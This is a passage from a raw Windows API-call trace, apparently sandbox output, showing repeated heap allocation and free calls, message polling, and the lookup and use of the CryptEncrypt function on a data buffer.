hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0208.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0208.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0208.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0208.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0208.703] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0208.704] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0208.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0208.704] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0208.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0208.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0208.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0208.704] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0208.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0208.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0208.704] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0208.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0208.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0208.704] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0208.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0208.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0208.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0208.704] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0208.704] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0208.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0208.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0208.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0208.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0208.705] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0208.705] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0208.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0208.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0208.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0208.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0208.705] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0208.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0208.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0208.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0208.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0208.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0208.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0208.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0208.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0208.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0208.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0208.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0208.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0208.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0208.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0208.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0208.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0208.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0208.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0208.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0208.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0208.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0208.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0208.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0208.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0208.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f94) returned 0x2e942d0 [0208.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e942d0 | out: hHeap=0x970000) returned 1 [0208.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0208.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0208.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0208.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0208.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0208.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0208.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0208.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0208.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0208.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0208.762] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0208.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0208.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0208.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0208.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0208.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0208.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0208.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0208.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0208.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0208.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0208.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0208.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0208.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0208.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0208.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0208.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0208.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0208.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0208.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0208.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0208.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0208.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0208.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0208.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0208.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0208.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0208.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0208.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0208.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0208.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0208.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0208.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0208.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0208.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0208.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0208.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50aa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0208.765] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0208.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0208.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0208.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0208.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0208.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0208.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0208.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0208.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0208.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0208.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0208.765] CryptEncrypt (in: hKey=0xa87050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13f94, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13f98) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0208.766] HeapFree (in: hHeap=0x970000, 